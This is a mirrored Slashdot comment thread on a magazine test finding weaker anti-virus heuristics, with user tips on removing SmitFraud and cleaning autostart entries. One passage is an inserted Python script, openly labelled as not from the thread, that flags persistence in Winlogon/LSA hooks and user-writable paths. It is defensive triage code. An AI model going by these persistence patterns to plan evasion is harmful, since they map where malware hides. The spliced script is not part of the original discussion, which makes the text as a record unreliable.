Slashdot Mirror


Anti-Virus Effectiveness Down from Last Year

juct sends us Heise Security's summary of an article detailing the abilities of 17 current anti-virus solutions. German computer magazine c't has found that, compared to last year, the virus scanners are having a more difficult time recognizing malware. Quoting Heise: "For real protection, however, in view of the flood of new malware, the way these programs cope with new and completely unfamiliar attacks is more important. And that's where almost all of the products performed significantly worse than just a year ago. The typical recognition rates of their heuristics fell from approximately 40-50 per cent in the last test - at the beginning of 2007 - to a pitiful 20-30 per cent."

201 comments

  1. yeah, but.. by xubu_caapn · · Score: 2, Insightful

    do they run on Linux?

    --
    FYI: I don't know what you guys are talking about half the time.
    1. Re:yeah, but.. by _merlin · · Score: 5, Informative

      Considering how few viruses run on Linux, it's not as big a deal for Linux users. However, Linux machines that deliver content to Windows users (mail servers, usenet servers, bulletin boards, etc.) are a useful application for Linux virus scanners that detect viruses for other platforms. And the big names do function in this role: Kaspersky and AVG both have products for doing just this. And there's the free ClamAV as well, of course. The Linux versions of the big name products are probably no more or less effective than the Windows versions.

    2. Re:yeah, but.. by allcar · · Score: 4, Interesting

      You make an excellent point.
      Pro Linux, as I am, I still do not feel that we can afford to be complacent about the malware issue. The reason that Linux is largely unaffected is that it is not very widely used, especially by the sort of numpties that get tempted by exciting new screensavers bearing trojans.
      If/when we succeed in bringing Linux to the masses, this layer of protection will be torn away. I hope and believe that Linux is more secure by design and the same is probably true of many of the apps that are popular in Linux distros - you won't find ActiveX cheerfully opening the door to anyone. However nobody should be ignoring malware with the excuse that Linux is immune.

    3. Re:yeah, but.. by stirz · · Score: 1

      If you run many Windows applications under Linux via Wine, the (Windows) virus threat surely matters. As you usually don't launch Wine as root, $malware will only have limited system access, but write access for a Wine-run virus on /home/$user can be a real pain in the ass :-)

    4. Re:yeah, but.. by FudRucker · · Score: 1

      i agree, windows is such a vulnerable & fragile mess i refuse to use it anymore, continuing to use windows knowing this is about like refusing to get off the railroad tracks knowing a freight train is coming to run you over...

      --
      Politics is Treachery, Religion is Brainwashing
    5. Re:yeah, but.. by ccs.gott · · Score: 0

      You make an excellent point.
      Pro Linux, as I am, I still do not feel that we can afford to be complacent about the malware issue. The reason that Linux is largely unaffected is that it is not very widely used, especially by the sort of numpties that get tempted by exciting new screensavers bearing trojans.
      If/when we succeed in bringing Linux to the masses, this layer of protection will be torn away. I hope and believe that Linux is more secure by design and the same is probably true of many of the apps that are popular in Linux distros - you won't find ActiveX cheerfully opening the door to anyone. However nobody should be ignoring malware with the excuse that Linux is immune.

      The reason linux is largely unaffected is because it was designed better than its unworking counterpart. Whether or not it is installed on more machines matters not, as the default user does not have administrator privileges (root) while M$ does.

    6. Re:yeah, but.. by seandiggity · · Score: 1

      Let's not forget ClamWin, which will give ClamAV protection to Windows machines. The only real criticism I've seen is that it doesn't have a real-time scanner, but supposedly one is in the works. As it stands now, you can pair it with WinPooch for real-time scanning.

      --
      Geeks like to think that they can ignore politics, you can leave politics alone, but politics won't leave you alone.-rms
    7. Re:yeah, but.. by SCHecklerX · · Score: 1

      Um. Many mail gateways are linux boxes. That is the place you should be scanning your incoming mail for stuff that your non-clueful users will gleefully run on their windows boxes. See mimedefang.

    8. Re:yeah, but.. by xubu_caapn · · Score: 1

      haha, i was worried when i saw +2, Insightful. i'm glad i got what i deserved.

      --
      FYI: I don't know what you guys are talking about half the time.
    9. Re:yeah, but.. by skeeto · · Score: 1

      The reason that Linux is largely unaffected is that it is not very widely used .. If/when we succeed in bringing Linux to the masses, this layer of protection will be torn away

      I would argue that this is another reason to make sure new users are aware of software freedom. Why would they go grab that suspicious screensaver when they might look at it and say "this is not free software, so I have no use for it."? With a system like Debian GNU/Linux, if they want screensavers, it's just a simple sudo apt-get install xscreensavers (or whatever the package would be). The repository packages are signed and are safe as far as you trust the Debian maintainers (the repository mirror can be untrusted).

  2. smitFraud by Freaky+Spook · · Score: 4, Interesting


    I've had a lot of people bring me PCs infected with smitFraud that the big AVs have not even recognised or been able to properly remove. They have been pretty angry that the $90 or so they paid for a complete Internet Security product was not able to protect them.

    It causes Windows to pretty much choke and die as it just consumes so many resources and provides so much irritation, but major products like Trend or Symantec have not been able to successfully protect against or remove them; I have had to use custom written tools that you get off the net for free. They really dropped the ball with that one.

    1. Re:smitFraud by yoyhed · · Score: 1

      I know - you'd think they'd have figured it out by now since it's so easy for someone like you or me to identify it with a cursory look at the machine - although SmitFraudFix in safe mode works fine, you're right about the angry customer thing.

      --
      WHO NEEDS SHIFT WHEN YOU HAVE CAPSLOCK/ DAMN1
    2. Re:smitFraud by lukesky321 · · Score: 1

      Funny you mention this. I was fixing some guy's computer today and it was infected with smitFraud. Holy cow, I looked at how much memory was being used and only 10 MB of RAM was free. I ended up booting into safe mode and removing it with smitFraud which dare I say works miracles. He had McAfee which didn't do shit.

    3. Re:smitFraud by Barny · · Score: 3, Interesting

      Been getting this one a lot, the fix is usually fine for older variants but new versions and revisions spring up that it just seems to miss. The system seems clean at first, but usually about a month later it is all back.

      I usually tell customers this, and tell them they have two choices:
      1 we can try SmitFraudFix and who knows, it might be lucky, but if they have to bring it back in a month we will charge them again.
      2 we can backup all their data, format, reinstall and remove any executable files from their backup.

      The second always works, have never had a re-infection (well, have, but that is usually thanks to someone surfing porn regularly, proven to the customer by showing them the browse history) with it.

      Best protection for it, firefox + no-script, which I tell the customer and offer to install for no extra cost of course :)

      Only problem is, my boss kinda hates me, we don't get the same people bringing their machines in every 2 months anymore needing a software clean done :P

      --
      ...
      /me sighs
    4. Re:smitFraud by Anonymous Coward · · Score: 1, Insightful

      That's because you are providing a cure. Your boss wants you to provide a treatment.

    5. Re:smitFraud by Ephemeriis · · Score: 1

      I don't think I've seen a computer with a traditional virus infection in months now. They're all coming in with that smit crap - and you're right, commercial antivirus doesn't pick it up at all.

      The diagnosis is quick and obvious, the machine literally screams at you that it's infected. The disinfection tools are readily available, quick and effective. All things considered it's relatively painless to disinfect one of these machines.

      But I'm really surprised that commercial antivirus software isn't picking this stuff up. I've had quite a few unhappy customers wondering what their commercial antivirus was actually protecting them from.

      --
      "Work is the curse of the drinking classes." -Oscar Wilde
    6. Re:smitFraud by gardyloo · · Score: 1

      Kaspersky (which I really like, but I may switch to avast! once my Kas license runs out) has a website from mid-2005 mentioning perhaps the first waves of the smitFraud infections. It (http://www.viruslist.com/en/weblog?calendar=2005-07) claims:

      It seems that all (recent) Smitfraud variants have one thing in common: They all try to persuade the user to download PSGuard, a program which claims to remove the spyware (i.e. Smitfraud) which has been installed onto the system.

      Naturally the program only disinfects the infection once the user has paid for it.

      Although PSGuard is questionable in terms of motive, the program itself has no malicious payload whatsoever. This means we can't simply add detection for it to our databases.

      Is this still the way it works?

    7. Re:smitFraud by UnknownSoldier · · Score: 1

      Hey, thx for mentioning smitfraudfix! I wasn't aware of that tool! Gonna give this a try.

      One of the kids machine has something that keeps starting up the web browser (Firefox!) that I can't for the life of me figure out what is causing it. Tried the usual Adaware, SpyBot Search-n-Destroy, ClamWin, Hijack This, and even booting into safe-mode, but nothing detects it.

      Anyone else have a list of the essential anti-spyware tools? (Preferably free)

    8. Re:smitFraud by yoyhed · · Score: 1

      Your list looks good there, add in Spy Sweeper w/Antivirus if you can find the 15 day trial installer. For SFF, just boot into safe mode and run it and do option 2.

      --
      WHO NEEDS SHIFT WHEN YOU HAVE CAPSLOCK/ DAMN1
    9. Re:smitFraud by yoyhed · · Score: 1

      Yeah, the "spyware removal" program doesn't seem to be malicious, but who knows what info it's sending back - I've seen PSGuard, and I've seen WinAntiVirus 2007 more recently as the program it tries to get you to buy...

      --
      WHO NEEDS SHIFT WHEN YOU HAVE CAPSLOCK/ DAMN1
  3. after the ffact by wizardforce · · Score: 3, Insightful

    I think the real problem with malware is that by the time an antivirus/antispyware program is needed IT IS TOO LATE. You have already been infected; antivirus software is for after the fact, cleaning up the files that were installed or warning you of their presence in a file attachment etc. The real defense here is preventing this from happening in the first place. That is, educating users not to click haphazardly at anything that they feel like, and that is a heck of a challenge. Most users do not understand what can happen and many likely do not really care, they just want their new screensaver or whatever to work [bundled with spyware of course] and when their bad habits finally catch up with them and their computer slows to a virtual crawl, they go out and buy a new one thinking computers decay over time or something.

    --
    Sigs are too short to say anything truly profound so read the above post instead.
    1. Re:after the ffact by arotenbe · · Score: 1

      The problem is that computers DO decay over time, or at least Windows systems do. Unless you reinstall Windows frequently (which, of course, the uneducated masses never do), most systems will grind to a halt in a few years from the accumulation of registry keys and can't-uninstall software, not to mention the 2-4 simultaneous "security" programs typical computers have installed. Viruses and spyware only help to put these computers out of their misery.

      --
      Tomato wedge sperm darts that are Republican.
    2. Re:after the ffact by wizardforce · · Score: 1

      most systems will grind to a halt in a few years from the accumulation of registry keys and can't-uninstall software
      yes, eventually this is true but malware does a fine job of speeding up the process by a good 10 fold or more. winboxes will work for a pretty long time if they are not constantly installing and uninstalling software- the old compaq still has win95 on it and works fine- it just wasn't constantly burdened by a bunch of garbage accumulating over time. if a winbox like that is taken care of it can last well over a decade quite nicely. if it isn't well... there's always upgrading to one of the penguins :)

      --
      Sigs are too short to say anything truly profound so read the above post instead.
    3. Re:after the ffact by RAMMS+EIN · · Score: 1

      ``The real defense here is preventing this from happening in the first place.''

      Yes.

      ``That is, educating users not to click haphazerdly at anything that they feel like''

      No.

      Because, as you yourself point out,

      ``and that is a heck of a challenge. most users do not understand what can happen and many likely do not really care'' ...and they shouldn't have to. You open these attachments (etc.) because you think they will do something good. You don't expect them to mess up your computer. Without support from the operating system and other legit software on the computer, attachments _couldn't_ mess up your computer. The only reason they can is that the software people use to open them is insecure. It allows (through design, sloppiness, or bugs) arbitrary code execution where all it _should_ allow is viewing images and perhaps movies and sound. Proper sandboxing and safe code (which is easy to write in all but a handful of commonly used programming languages) will solve this problem.

      As an example of the above, I am working on a programming language, and one thing this programming language will feature is different subsets for different niches. One such subset will allow any program to be written, so long as it doesn't change the state of anything outside the program that was not passed into it as a modifiable data structure. That means no interaction with any files on your system, no popup windows, no phoning home, no sending spam, etc. If you give it a file to read and an area of the screen to draw on, these are the only things it will be able to do.

      --
      Please correct me if I got my facts wrong.
    4. Re:after the ffact by Tim+C · · Score: 1

      Oh rubbish. In more than a decade of Windows PC ownership and use I've not had a single machine grind to a halt in this manner. The machine I'm typing this on now I've had for 3+ years without ever reinstalling it.

      I'm not saying that it can't happen, but it most definitely is not inevitable.

    5. Re:after the ffact by Suddenly_Dead · · Score: 2, Interesting

      I think the real problem with malware is that by the time an antivirus/antispyware program is needed IT IS TOO LATE. you have already been infected, antivirus software is for after the fact, cleaning up the files that were installed or warning you of their presence in a file atatchment etc


      There's this not-too-recent development in Antivirus programs where they actually scan executables before and as you execute them, preventing the infection.

      Of course it's not perfect, but it's probably the reason most people have virus scanners. Once a system is infected it's useless to most users, who will simply bring it into a shop or trash it because "it's too slow", and even many experienced users would simply give up and reinstall Windows at that point.
    6. Re:after the ffact by Ajehals · · Score: 1

      You are right, a well managed Windows environment can be perfectly stable for long periods (assuming you carry out the usual maintenance tasks as required). The problem is that well managed generally means that you are not installing little bits of software whenever the need strikes you, you don't grab a copy of Windows Weekly with £500 worth of freeware, trialware and demos every other week and install them all and then remove most of them again. Most People (tm) do, and as such most Windows installs degrade over time, and therefore for most people it *is* inevitable, but a consequence of usage, not the OS itself*.

      *Saying that, I don't think I have ever seen a Linux box suffer in this way even after it has had X thousands of applications installed and removed. I have no clue about how OS X or Apple OSes fare but I haven't heard any complaints...

    7. Re:after the ffact by kvezach · · Score: 1

      As an example of the above, I am working on a programming language, and one thing this programming language will feature is different subsets for different niches. One such subset will allow any program to be written, so long as it doesn't change the state of anything outside the program that was not passed into it as a modifiable data structure.

      That sounds a lot like capabilities, which is a very good idea. It's just too bad none of the larger OSes support them by default, which means we're stuck with having to add compartmentalization explicitly.

    8. Re:after the ffact by Opportunist · · Score: 1

      Well, it doesn't have to be that way. One could argue that if you install software bundled with questionable drivers (aka "copy protection mechanisms"), with strange install and uninstall routines (a staple of certain "freeware" that would more correctly be labeled adware) or from questionable sources, you're prone to ending up with software that doesn't cooperate properly with your OS.

      I don't even want to give MS the blame here. When you load your machine with drivers that hog more system resources than they should (and Securom for example is very well known for doing just that, especially when you happen to have a few different versions on your system), your system will degenerate.

      --
      We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
    9. Re:after the ffact by Opportunist · · Score: 1

      But that would have to be a feature of the OS, not the program. That your program "behaves" is nice, but that doesn't keep another program (i.e. malware) from being not nice.

      Now, if the OS takes good care of security, a lot of things that can actually be a security risk or a feature won't be possible anymore. Certain tools require you to be able to tap into another process's memory or network traffic to be useful. Also, plugins and the like (the dreaded BHO security hole in IE, which is actually meant as a feature, and can be used as such) won't be possible.

      That's a problem that won't go away. More security also means more limitation. For you, and for the programs you want to use. Now, of course one COULD implement decent security, but that would first of all require the OS to let you work and play with an account that doesn't need administrator privileges to work at all...

      --
      We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
    10. Re:after the ffact by Anonymous Coward · · Score: 0

      As an example of the above, I am working on a programming language, and one thing this programming language will feature is different subsets for different niches. One such subset will allow any program to be written, so long as it doesn't change the state of anything outside the program that was not passed into it as a modifiable data structure. That means no interaction with any files on your system, no popup windows, no phoning home, no sending spam, etc. If you give it a file to read and an area of the screen to draw on, these are the only things it will be able to do.

      Wait, you're working on Java and their applet security sandbox system? Wow, blast from the past. You think I could borrow your time machine for a while? I wouldn't mind visiting, say, 1920s New York. Or does it even let you go back to the past? Maybe all it can do is instantaneously transport you forward in time 17 years?

    11. Re:after the ffact by Opportunist · · Score: 1

      Not-too-recent is good. That feature is a few decades old.

      The problem is that you have to know a virus to detect it. Welcome to the arms race! That's why heuristics have been the way to go for a while now, because that way you can at least flag something as suspicious if you don't know it. But ... well, the drugs don't work anymore.

      --
      We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
    12. Re:after the ffact by Tony+Hoyle · · Score: 1

      The problem with that is badly implemented versions (*cough* Norton *cough*) that scan everything, executable or not, and slow the machine down so much that the cure is worse than the disease - I've had machines to sort out that have been using 80% of their cycles just scanning text files over and over again.

    13. Re:after the ffact by Opportunist · · Score: 1

      Recently I got a lecture from my boss, telling me I should not say anything bad about competitors. So now my comment about Norton is usually "Their product comes in really good looking boxes".

      While it makes sense to scan everything, not only PE32/64 executables (ya know, exploits and macros), it does NOT make sense to spend an evening scanning your correspondence. It is actually fairly easy to detect an exploit (they have to be done in very, very specific ways to work, obviously), and macro malware doesn't really play a terribly important role anymore today.

      --
      We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
    14. Re:after the ffact by Ephemeriis · · Score: 1

      I think the real problem with malware is that by the time an antivirus/antispyware program is needed IT IS TOO LATE. you have already been infected, antivirus software is for after the fact, cleaning up the files that were installed or warning you of their presence in a file atatchment etc.

      Generally speaking, the antivirus that we sell and install is a preventative measure. Sure, educating users is the best way to go...but even then you've got mistakes and mis-clicks. And some folks just don't learn. Good antivirus scans executables and attachments as they're encountered and will block execution and warn you if it sees something suspicious. Good antivirus can actually protect you from getting infected even if you click on something you shouldn't. No, it isn't perfect, but it's another layer of protection.

      --
      "Work is the curse of the drinking classes." -Oscar Wilde
    15. Re:after the ffact by snib · · Score: 1

      I agree with you.... In fact I just posted here and asked this question:

      If people would start making an effort to use common sense in web surfing, would the need for an anti-virus disappear? Or is it more practical to run an imperfect, bogged-down piece of security software (that really doesn't work too well, judging by my survey of people's computers) so that people can surf without thinking?

      --
      This message will self-destruct in 5, 4, 3...
    16. Re:after the ffact by kevingolding2001 · · Score: 1

      Dude, you left out the punchline!!

      You were supposed to end with "$*%& [NO CARRIER]"

    17. Re:after the ffact by phantomcircuit · · Score: 0

      It really is not that difficult to clean an infected system of virtually any payload.

      1. Check all autorun entries using Autoruns
      2. Repeat step 1
      3. If there are entries which have come back, use Process Explorer to kill them
      4. Should the processes be respawning each other (tag teaming) then proceed to the alternative method
      5. Reboot
      6. Delete files that were being added and probably find other similar looking crap and delete that too

      Alternatively
      1. Reboot in safe mode
      2. Use Autoruns
      3. Delete crap

      Really this is not that complicated unless an MBR payload is used.
    18. Re:after the ffact by dave562 · · Score: 1

      Really this is not that complicated unless an MBR payload is used.

      Or until you get a .dll file that hooks LSASS or WINLOGON. I eventually used pendmove to delete the .dll but then the system hung when booting the OS. It was a Win2K box with out-of-date AV running IE 5.0 so I can't really hate on Microsoft for that one. If it had been up to date it wouldn't have been infected.

    19. Re:after the ffact by Sloppy · · Score: 2, Insightful

      If people would start making an effort to use common sense in web surfing, would the need for an anti-virus disappear? Or is it more practical to run an imperfect, bogged-down piece of security software (that really doesn't work too well, judging by my survey of people's computers) so that people can surf without thinking?

      Both approaches are wrong. The best approach is for network client applications (web browsers, email readers, and maybe even removable media filesystem mounters) to make usage not dangerous. Clicking a link or viewing a page, should never(*) run external code; it shouldn't even ask the user "would you like to infect your system?" Just don't execute stuff that came from outside. And downloading a file (or mounting removable media) should never cause the newly acquired file(s) to have executable permission. Executing foreign code should always result from an active step, where the administrator goes out of his way to allow execution/infiltration.

      This is the normal state of affairs on some operating systems, and it's the biggest (by far) reason that Malware is uncommon on Unix-like systems.

      (*) The only exception to the above should be code that is run in very weak environments where dangerous capabilities are not available. This means stuff should run either in very restrictive sandboxes (e.g. run binaries as a "nobody" who has very little I/O permission -- certainly not filesystem access beyond perhaps some ramdisk that is dedicated to that process), or arguably in contexts where the code doesn't have much expressive power to begin with (e.g. javascript in a web browser).

      And even these exceptions are hard to get right, so they should be approached with extreme caution. For example, web browsers should probably disable Javascript by default, and only have controls to explicitly enable it, on a website-by-website basis. Current versions of Firefox get this wrong and that's a shame, because I know that years ago, I saw some Mozilla derivatives that got it right.

      --
      As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
    20. Re:after the ffact by Anonymous Coward · · Score: 0

      Unfortunately that does not fix the problem of some nasty things which attach themselves to or damage Windows .dll files.

    21. Re:after the ffact by snib · · Score: 1

      > For example, web browsers should probably disable Javascript by default, and only have controls to explicitly enable it, on a website-by-website basis. Current versions of Firefox get this wrong and that's a shame, because I know that years ago, I saw some Mozilla derivatives that got it right.

      I know a lot of people that share your opinion and use extensions such as NoScript...but personally I find it very annoying to have to enable JavaScript every time I find a site that needs it. JavaScript is used for menus, mouseover effects, cookies, sometimes even layout adjustments. I tried NoScript and found several pages that just looked like crap or were hard to use until I figured out that it's because they use JavaScript to help with the menus or layout.

      I like what you're saying about safe browsers though...maybe if JavaScript simply didn't have the capabilities to access filesystem and ActiveX objects like it does, it would be a safer tool. I know CSS can be used for mouseover effects and all that, but most Internet users don't have a browser that supports modern CSS (*cough* IE *cough*). JavaScript is a much more universal approach, and it would be a shame to lose all the benefits of it just because of a bunch of additional crap that Microsoft and others have added on to the standard.

      --
      This message will self-destruct in 5, 4, 3...
    22. Re:after the ffact by garisan · · Score: 1

      Educating users to click or not to click is utopian. Still, one of the best and least used practices is regular backups. I have documents and data stuff in another partition, leaving C: only for the operating system and installed applications. Scheduled daily incremental backups of the whole partition with imaging software, and once a week a full backup deleting the previous week's. If I get infected, I restore yesterday's backup and in 15 minutes I'm back in business without touching my personal data and stuff, much less time than running two or three AVs to try to remove an unknown malware.

    23. Re:after the ffact by phantomcircuit · · Score: 1

      Hooking LSASS or WINLOGON means there is a registry setting involved which can easily be deleted. Stop the process or thread using Process Explorer, delete the registry key, reboot, delete the file, reboot. Magic.

    24. Re:after the ffact by phantomcircuit · · Score: 1

      Well, if you have modified system binaries they will all show up in Autoruns because it verifies signatures.

      You'll then know to repair windows and possibly to delete all other executables on the system and reinstall all applications.
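    The cleanup procedure above (snapshot the autorun entries, repeat, kill whatever respawns, delete) together with the remark that Autoruns verifies signatures, as an added Python example that is not from this thread: it parses two constructed autorunsc-style CSV snapshots (the column subset and the entries are made-up assumptions modelled on `autorunsc -a * -c -s` output, not a real export), flags entries whose signature is not verified, whose image lives in a user-writable directory, or which hook the Winlogon/LSA extension points the later replies mention, and lists the entries that came back after you deleted them.

```python
import csv
import io

# Constructed sample data (not real autorunsc output): two snapshots of the same
# machine, one before cleanup and one after a reboot. Column names are an
# assumption modelled on Autoruns' CSV export; adjust them to your own export.
SNAPSHOT_BEFORE = r'''Entry Location,Entry,Enabled,Category,Signer,Image Path,Launch String
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,SecurityHealth,enabled,Logon,(Verified) Microsoft Windows,c:\windows\system32\securityhealthsystray.exe,%windir%\system32\SecurityHealthSystray.exe
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,sysupd,enabled,Logon,(Not verified),c:\users\kid\appdata\local\temp\sysupd.exe,C:\Users\kid\AppData\Local\Temp\sysupd.exe /s
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify,wnlog,enabled,Winlogon,(Not verified),c:\windows\system32\wnlog32.dll,wnlog32.dll
'''

# After deleting both flagged entries and rebooting, one of them is back.
SNAPSHOT_AFTER = r'''Entry Location,Entry,Enabled,Category,Signer,Image Path,Launch String
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,SecurityHealth,enabled,Logon,(Verified) Microsoft Windows,c:\windows\system32\securityhealthsystray.exe,%windir%\system32\SecurityHealthSystray.exe
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,sysupd,enabled,Logon,(Not verified),c:\users\kid\appdata\local\temp\sysupd.exe,C:\Users\kid\AppData\Local\Temp\sysupd.exe /s
'''

# Path fragments that a normal autostart binary has no business living under.
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\")
# Registry locations where a DLL gets loaded into winlogon/lsass.
LOGON_HOOKS = ("\\winlogon\\", "\\control\\lsa")


def parse_autoruns(text):
    """Key each CSV row by (registry location, entry name) so snapshots compare cleanly."""
    reader = csv.DictReader(io.StringIO(text.strip()))
    return {(row["Entry Location"], row["Entry"]): row for row in reader}


def suspicious(row):
    """Return the reasons an entry deserves a closer look; an empty list means it looks benign."""
    reasons = []
    # Autoruns prefixes a good Authenticode signature with "(Verified)".
    if not row["Signer"].startswith("(Verified)"):
        reasons.append("signature not verified")
    image = row["Image Path"].lower()
    if any(fragment in image for fragment in USER_WRITABLE):
        reasons.append("image lives in a user-writable directory")
    location = row["Entry Location"].lower()
    if any(hook in location for hook in LOGON_HOOKS):
        reasons.append("hooks a Winlogon/LSA extension point")
    return reasons


def triage(text):
    """Map every suspicious (location, entry) in a snapshot to its list of reasons."""
    flagged = {}
    for key, row in parse_autoruns(text).items():
        reasons = suspicious(row)
        if reasons:
            flagged[key] = reasons
    return flagged


def came_back(before, after, removed):
    """Entries you removed from `before` that are present again in `after`: the respawners."""
    before_keys = parse_autoruns(before).keys()
    after_keys = parse_autoruns(after).keys()
    return sorted(key for key in removed if key in before_keys and key in after_keys)


if __name__ == "__main__":
    flagged = triage(SNAPSHOT_BEFORE)
    for (location, entry), reasons in flagged.items():
        print(f"{location}\\{entry}: {'; '.join(reasons)}")
    for key in came_back(SNAPSHOT_BEFORE, SNAPSHOT_AFTER, list(flagged)):
        print("came back after reboot, kill the parent first:", key)
```

    Run it against two real exports by reading the files into `SNAPSHOT_BEFORE` and `SNAPSHOT_AFTER`; anything `came_back` reports is the tag-teaming case, where the right move is the safe-mode path rather than deleting the same entry again.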

  4. My expectations are not that high... by RuBLed · · Score: 4, Informative

    I always assume an antivirus is only as good as its current signatures. Heuristics are good but nowadays, I could literally count on my fingers the number of times they did the job. The best defense is still knowing what you are running, with or without an antivirus. Most of the annoyances I see are done by the local script / virus kiddies; their work rarely makes it outside the country so the signatures against those are not a priority. (Although what I hate is that most of these local scripts/virii are just copycats of popular ones, yet popular AVs rarely detect them...)

    1. Re:My expectations are not that high... by Opportunist · · Score: 2, Interesting

      That's maybe the most insightful thing I've read in this thread so far.

      I work for an AV company. Our focus lies on "local threats". Not necessarily the local scriptkiddy community, more the phishing and ID fraud thing.

      For about a year now, those things have been "localized". I'm not joking when I say that, depending on the country you're in, you get different versions of a certain trojan, targeting exactly YOUR banks, YOUR finance services, YOUR online stores. They actually go to the lengths of recreating the local bank pages down to the links. And then this malware is spread very, very well targeted on your country or state, or even only your county. They noticed that AV vendors do actually work together and something that spreads globally is easily detected within a second, and not an hour later every AV vendor has a signature update that finds it.

      With a very narrowly targeted release, you can stay "under the radar" and go undetected by most AV vendors who don't have any information gathering tools in that local area.

      In short, don't buy the "best" AV tool. If there is one local company, buy theirs! They have the highest chance to find the local threats fastest, while still getting the global threats. Local threats, though, are the (IMO) more serious ones, not only making you a spam box or trashing your system, but they steal your ID, loot your account and destroy your credit rating!

      Now, in turn I also get a fair deal of machines on my desk that have been affected by those ID problems (take a wild guess who's interested in finding out what's cooking). Most of those machines were not protected at all (or by Windows Defender, which is no protection. No MS bashing, but it can't be when you think about it), some were protected by global players in the AV field (most of them by a certain company with a capital N in their name), but none by local companies that DID actually find the threat.

      You can test it yourself. Should you happen to get one of those targeted malware, send it to virustotal and look for yourself. Local companies will find it. Larger companies will find it much later, or not at all, because the spread is so tiny (thus the perceived threat so small) that it doesn't matter to them.

      --
      We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
    2. Re:My expectations are not that high... by Thaelon · · Score: 1

      If you don't want to be flamed or constantly corrected, stop spelling viruses, "virii". Besides it diminishes your credibility significantly.

      --

      Question everything

    3. Re:My expectations are not that high... by Machtyn · · Score: 1

      So, why don't the smaller companies share their knowledge with the bigger players (like you mention everyone does with the global infectors)? This is not meant as an accusatory question. Perhaps they do, but the larger companies ignore them... I don't know.

    4. Re:My expectations are not that high... by Opportunist · · Score: 1

      They do. Actually, the cooperation between AV companies is remarkable and should definitely be considered exemplary for many other industries. Of course, basically it's done out of necessity rather than because we're all a happy family, but it's simply not economically feasible to build up a detection network that covers every single corner of the web.

      The reason why it sometimes doesn't work out is that you're just a tiny company, finding "something". Something that doesn't affect 99% of the big player's user base. It simply has no priority. Not to mention that it's maybe not even something 'real' because only some small company in some corner of the planet considers it important.

      It usually matters only in the case of very specifically targeted malware, maybe aimed at a bank in a single country or state. Malware targeting such a small community basically doesn't matter in the global picture. It does, of course, for a company doing mainly business in that local area.

      --
      We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
    5. Re:My expectations are not that high... by dave562 · · Score: 1

      Or gives him old school points for keeping a pre-internet meme alive.

  5. AV's??? by flakron · · Score: 1, Redundant

    when you have an AV you have viruses, no AV no viruses

    1. Re:AV's??? by Tastecicles · · Score: 1

      WHAT??

      Enough said.

      --
      Operation Guillotine is in effect.
    2. Re:AV's??? by flakron · · Score: 1

      just a joke

    3. Re:AV's??? by TheVelvetFlamebait · · Score: 1

      That's true. I've uninstalled my AV software, and I haven't been notified once that my computer's infected. Plus it's cheaper too!

      --
      You know, there is a difference between trolling and pointing out the flaws in your reasoning. Just saying.
    4. Re:AV's??? by Opportunist · · Score: 3, Informative

      He's right. He's just right.

      True story:

      A customer call. Quite irate person, yelling and screaming at our poor techie, telling him in no uncertain terms that he finally uninstalled our piece of junk and installed $competitor_software, because our piece of electron crap kept popping up and nagging him with some "virus found" junk and cutting into his productivity while $competitor_software doesn't.

      So. Now question for 500: What the heck do you tell him?

      --
      We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
    5. Re:AV's??? by Doctor-Optimal · · Score: 1

      So. Now question for 500: What the heck do you tell him?
      "We regret the loss of your custom. Goodbye"
      --
      New punctuation update "~" (no quotes) at the end of a line to indicate sarcasm. ~
    6. Re:AV's??? by Opportunist · · Score: 1

      I am not supposed to lie to our customers.

      --
      We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
    7. Re:AV's??? by Anonymous Coward · · Score: 0

      Have a nice life, we don't need an idiot like you? *click* always worked for me anyway
      As a side note, my captcha was privacy

  6. A matter of principle by Anonymous Coward · · Score: 0

    It's almost as if systems require genuine integrated security, rather than an anti-virus afterthought. Perish the thought.

  7. running multiple antiviruses by improfane · · Score: 4, Insightful

    No one company has the resources to be aware of every virus. The standard advice is to run more than one.

    In Windows, if you wanna run more than one, you can only have the real time protection of a single anti-virus enabled or you get conflicts.

    Meaning you rely on the on-demand protection of every other anti-virus and have to manually run them regularly OR set up schedules. What kind of user will do that?

    --
    Slashdot needs Geekcode | Can anyone recommend any good SCIFI? My tastes: Foundation, Startide Rising, CITY, Ringworld,
    1. Re:running multiple antiviruses by allcar · · Score: 1

      Even if you could run more than one in real time, on normal hardware, it would be insane. I am forced to use McAfee at work and the delay in opening even moderate sized files is really noticeable. For large files, it's really intrusive. When I make a large EAR file for deploying to an application server, it can take several minutes. Much of that delay is due to the AV. Performing a similar operation at home on comparable hardware running Linux without AV is much faster. If two virus checkers insisted on inspecting every file I accessed it would absolutely become necessary to upgrade the hardware. It's a sad fact that the hardware industry is being driven by bloatware and anti malware.

    2. Re:running multiple antiviruses by MrMr · · Score: 2, Funny

      It's a sad fact that the hardware industry is being driven by bloatware and anti malware
      You should look on the bright side: Since everybody has to buy high-end hardware, it also becomes much cheaper for people who need it for more interesting stuff.
      (I would for instance very much like to see the next main-stream OS requiring 16 cores or more to run a simple email client on a desktop machine...)

    3. Re:running multiple antiviruses by Atario · · Score: 1
      --
      "A great democracy must be progressive or it will soon cease to be a great democracy." --Theodore Roosevelt
    4. Re:running multiple antiviruses by martin-boundary · · Score: 1
      Nice theory. In practice though, you'll be using 15 cores just to draw fancy menus and bouncing icons. The 16th one will be shared between your app and the system sound effects manager.

      User friendliness is the worst idea since the mouse.

    5. Re:running multiple antiviruses by MrMr · · Score: 1

      You miss my point: I wouldn't run a gui on such a 16-core desktop box.

    6. Re:running multiple antiviruses by brunde · · Score: 1

